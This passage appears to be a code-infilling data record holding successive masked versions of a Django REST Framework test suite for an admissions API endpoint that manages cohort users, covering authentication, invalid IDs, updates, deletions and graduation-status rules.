"step-1": "<mask token>\n\n\nclass CohortIdUserIdTestSuite(AdmissionsTestCase):\n <mask token>\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_without_auth(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n response = self.client.get(url)\n json = response.json()\n self.assertEqual(json, {'detail':\n 'Authentication credentials were not provided.', 'status_code':\n status.HTTP_401_UNAUTHORIZED})\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid cohort_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n <mask token>\n <mask token>\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_without_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 
model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_with_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n model_dict = self.get_cohort_user_dict(1)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'id': model.cohort_user.id, 'role': model.cohort_user.\n role, 'educational_status': model.cohort_user.\n educational_status, 'finantial_status': 
model.cohort_user.\n finantial_status}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(self.count_cohort_user(), 1)\n self.assertEqual(self.get_cohort_user_dict(1), model_dict)\n <mask token>\n <mask token>\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEqual(self.count_cohort_user(), 0)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_task(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True, task=True,\n task_status='PENDING', task_type='PROJECT')\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'User has tasks with status pending the educational status cannot be GRADUATED'\n }\n self.assertEqual(json, expected)\n 
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Cannot be marked as `GRADUATED` if its financial status is `LATE`'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n",
"step-2": "<mask token>\n\n\nclass CohortIdUserIdTestSuite(AdmissionsTestCase):\n <mask token>\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_without_auth(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n response = self.client.get(url)\n json = response.json()\n self.assertEqual(json, {'detail':\n 'Authentication credentials were not provided.', 'status_code':\n status.HTTP_401_UNAUTHORIZED})\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid cohort_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': 999})\n data = 
{}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid user_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_without_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], 
apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_with_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n model_dict = self.get_cohort_user_dict(1)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'id': model.cohort_user.id, 'role': model.cohort_user.\n role, 'educational_status': model.cohort_user.\n educational_status, 'finantial_status': model.cohort_user.\n finantial_status}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(self.count_cohort_user(), 1)\n self.assertEqual(self.get_cohort_user_dict(1), model_dict)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def 
test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': 9999})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 9999, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, 
status.HTTP_204_NO_CONTENT)\n self.assertEqual(self.count_cohort_user(), 0)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_task(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True, task=True,\n task_status='PENDING', task_type='PROJECT')\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'User has tasks with status pending the educational status cannot be GRADUATED'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Cannot be marked as `GRADUATED` if its financial status is `LATE`'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n",
"step-3": "<mask token>\n\n\nclass CohortIdUserIdTestSuite(AdmissionsTestCase):\n \"\"\"Test /cohort/:id/user/:id\"\"\"\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_without_auth(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n response = self.client.get(url)\n json = response.json()\n self.assertEqual(json, {'detail':\n 'Authentication credentials were not provided.', 'status_code':\n status.HTTP_401_UNAUTHORIZED})\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid cohort_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 
'user_id': 999})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid user_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_without_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], 
apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_with_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n model_dict = self.get_cohort_user_dict(1)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'id': model.cohort_user.id, 'role': model.cohort_user.\n role, 'educational_status': model.cohort_user.\n educational_status, 'finantial_status': model.cohort_user.\n finantial_status}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(self.count_cohort_user(), 1)\n self.assertEqual(self.get_cohort_user_dict(1), model_dict)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def 
test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': 9999})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 9999, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, 
status.HTTP_204_NO_CONTENT)\n self.assertEqual(self.count_cohort_user(), 0)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_task(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True, task=True,\n task_status='PENDING', task_type='PROJECT')\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'User has tasks with status pending the educational status cannot be GRADUATED'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Cannot be marked as `GRADUATED` if its financial status is `LATE`'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n",
"step-4": "<mask token>\nimport re\nfrom unittest.mock import patch\nfrom django.urls.base import reverse_lazy\nfrom rest_framework import status\nfrom breathecode.tests.mocks import GOOGLE_CLOUD_PATH, apply_google_cloud_client_mock, apply_google_cloud_bucket_mock, apply_google_cloud_blob_mock\nfrom ..mixins import AdmissionsTestCase\n\n\nclass CohortIdUserIdTestSuite(AdmissionsTestCase):\n \"\"\"Test /cohort/:id/user/:id\"\"\"\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_without_auth(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n response = self.client.get(url)\n json = response.json()\n self.assertEqual(json, {'detail':\n 'Authentication credentials were not provided.', 'status_code':\n status.HTTP_401_UNAUTHORIZED})\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid cohort_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n 
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': 999})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid user_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 